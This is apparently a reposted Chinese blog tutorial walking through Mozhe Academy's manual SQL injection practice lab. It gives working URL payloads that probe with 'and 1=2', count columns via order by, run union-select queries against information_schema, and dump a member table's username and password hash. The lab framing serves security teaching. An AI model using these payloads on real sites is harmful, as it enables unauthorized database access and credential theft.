IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 大数据 -> 墨者学院手工SQL注入练习 -> 正文阅读

[大数据]墨者学院手工SQL注入练习

1.登录墨者学院(https://www.mozhe.cn/) 点击手工SQL注入练习专题,没注册号的注册一个号。

在这里插入图片描述
3.寻找可以SQL注入的位置,(蓝箭头)可见网站为一个目录页面,不存在SQL注入点,接下来就在此页面下找可注入点(红箭头)。
在这里插入图片描述
?id=1 可以尝试下是否可以注入
在这里插入图片描述
http://219.153.49.228:48479/new_list.php?id=1 and 1=1 不报错
http://219.153.49.228:48479/new_list.php?id=1 and 1=2 报错,发现注入点(这个地方可以在id等于1后面随便输和and 1=2效果是一样的)
4.开始注入
http://219.153.49.228:48479/new_list.php?id=1 使用order by 查询列名 ,发现到5是报错,说明列名不大于5,所以列名为4,注入方法在id=1后面输入 order by 1,回车看是否报错,不报错的话重新在id=1后面输入 order by 2,以此类推直到报错。
http://219.153.49.228:48479/new_list.php?id=-1 union select 1,2,3,4
这里使用union,必须要让id后面数字改变以产生错误。列名为4所以这里是1,2,3,4。
在这里插入图片描述

此处显示2,3那么我们数据就可以往2,3上输入查询(网站上的%20是url编码把空格变成了%20)
数据库版本:version()
用户名:user()
数据库名字:database()
主机操作系统:@@version_compile_os
http://219.153.49.228:48479/new_list.php?id=-1 union select 1,version(),user(),4

在这里插入图片描述
http://219.153.49.228:48479/new_list.php?id=-1 union select 1, database(),@@version_compile_os,4
在这里插入图片描述
information_schema这张数据表保存了MySQL服务器所有数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限。
information_schema.tables : 记录所有表名信息的表
information_schema.columns : 记录所有列名信息的表
table_name 表名
column_name 列名
table_ schema 数据库名
查询指定数据库名mozhe_Discuz_StormGroup下的表名信息:
http://219.153.49.228:48680/new_list.php?id=-1 union select 1,table_name,3,4 from information_schema.tables where table_ schema=‘mozhe_Discuz_StormGroup‘
(http://219.153.49.228:48680/new_list.php?id=-1%20union%20select%201,%20table_name,3,4%20from%20information_schema.tables%20where%20table_schema=%27mozhe_Discuz_StormGroup%27)
在这里插入图片描述
查出表名为StormGroup_member
我们根据所得出的这个表名可查询此表列名
http://219.153.49.228:48680/new_list.php?id=-1%20union%20select%201,%20group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name=%27StormGroup_member%27
在这里插入图片描述
查询指定数据
http://219.153.49.228:48680/new_list.php?id=-1%20union%20select%201,%20name,password,4%20from StormGroup_member
在这里插入图片描述
在这里插入图片描述
Name:mozhe
Password: dsan13(356f589a7df439f6f744ff19bb8092c0)

  大数据 最新文章
实现Kafka至少消费一次
亚马逊云科技:还在苦于ETL?Zero ETL的时代
初探MapReduce
【SpringBoot框架篇】32.基于注解+redis实现
Elasticsearch:如何减少 Elasticsearch 集
Go redis操作
Redis面试题
专题五 Redis高并发场景
基于GBase8s和Calcite的多数据源查询
Redis——底层数据结构原理
上一篇文章      下一篇文章      查看所有文章
加:2021-10-03 17:09:36  更:2021-10-03 17:11:45 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/23 22:30:21-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码